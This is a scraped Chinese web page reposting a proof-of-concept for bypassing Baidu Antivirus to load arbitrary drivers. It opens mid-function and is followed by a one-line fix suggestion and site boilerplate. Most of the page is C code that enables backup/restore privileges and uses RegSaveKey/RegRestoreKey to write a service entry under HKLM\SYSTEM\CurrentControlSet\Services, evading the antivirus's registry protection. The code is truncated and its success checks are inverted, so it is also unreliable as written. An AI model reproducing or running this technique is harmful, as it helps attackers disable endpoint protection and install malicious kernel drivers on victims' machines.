再再绕百度杀毒任意加载驱动(POC)
发表时间:2022-06-27 来源:学卫网整理相关软件相关文章人气:
TOKEN_QUERY,&hToken))break;if(!LookupPrivilegeValue(NULL,lpName,&luid))break;tp.PrivilegeCount = 1;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);}while(FALSE);if(hToken != NULL)CloseHandle(hToken);return bRet;}BOOL DumpReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_BACKUP_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS)break;if(RegSaveKey(hCur,szFilePath,NULL) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}BOOL RestoreReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_RESTORE_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)break;if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}int main(int argc, char* argv[]){//先本地构造生成一个poc hiv文件// DumpReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");//远程饶过写注册表加载驱动RestoreReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");return 0;}
修复方案:牺牲点用户体验吧就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。
百度杀毒,搭载百度自研双引擎——雪狼引擎、慧眼引擎,采用百度独有的“深度学习”技术,具有超大规模训练集、高木马检出率、极低误报、体积小等特点。
软件下载:
